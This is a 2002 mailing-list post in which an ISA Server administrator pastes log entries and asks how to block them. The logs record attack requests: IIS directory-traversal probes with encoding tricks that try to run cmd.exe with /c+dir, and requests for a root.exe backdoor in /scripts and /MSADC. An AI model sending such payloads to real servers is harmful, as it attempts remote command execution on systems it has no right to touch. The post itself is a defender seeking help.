Block these entries inISA logs please!!!!!!
- From: Vinaykumar G <G.Vinay@xxxxxxxxx>
- To: isalist@xxxxxxxxxxxxx
- Date: Tue, 12 Mar 2002 02:15:32 -0800
Hi All,
Can anyone let me know as how we can block these strange entries in
my ISA Log. What is someone exactly trying to execute?
What should be done to block these entries?I have ISA in integrated mode
with win2k server fully patched.
xxx.xxx.xxx.xxx anonymous - N 2002-03-10 06:55:16
W3ReverseProxy ISAICR - - - - - - 97
- TCP GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
401 - 12202 0 Default rule -
xxx.xxx.xxx.xxx anonymous - N 2002-03-10 06:55:18
W3ReverseProxy ISAICR - - - - - - 97
- TCP GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
401 - 12202 0 Default rule -
xxx.xxx.xxx.xxx anonymous - N 2002-03-10 06:55:19
W3ReverseProxy ISAICR - - - - - - 98
- TCP GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
401 - 12202 0 Default rule -
xxx.xxx.xxx.xxx anonymous - N 2002-03-10 06:55:21
W3ReverseProxy ISAICR - - - - - - 96
- TCP GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
401 - 12202 0 Default rule -
xxx.xxx.xxx.xxx anonymous - N 2002-03-10 06:55:23
W3ReverseProxy ISAICR - - - - - - 100
- TCP GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
401 - 12202 0 Default rule -
xxx.xxx.xxx.xxx anonymous - N 2002-03-10 06:55:25
W3ReverseProxy ISAICR - - - - - - 96
- TCP GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
- 12202 0 Default rule -
xxx.xxx.xxx.xxx anonymous - N 2002-03-10 12:47:07
W3ReverseProxy ISAICR - - - - - - 72
- TCP GET /scripts/root.exe?/c+dir - -
12202 0 Default rule -
xxx.xxx.xxx.xxx anonymous - N 2002-03-10 12:47:09
W3ReverseProxy ISAICR - - - - - - 70
- TCP GET /MSADC/root.exe?/c+dir - - 12202 0
Default rule -
Regards,
Vinay.
Other related posts:
